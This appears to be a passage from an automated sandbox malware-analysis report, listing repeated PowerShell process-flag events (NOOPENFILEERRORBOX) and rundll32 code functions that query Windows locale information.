Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
2_2_6E18C3CB |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E18C643 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E18C68E |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E18C729 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
2_2_6E18C7B6 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E18CC36 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E1834FA |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
2_2_6E18CD03 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E18C59A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E18CA06 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
2_2_6E18CB2F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E183961 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, |
3_2_6E141E8A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
3_2_6E18C3CB |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E18C643 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E18C68E |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E18C729 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E1834FA |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
3_2_6E18CD03 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
3_2_6E18CB2F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
3_2_6E183961 |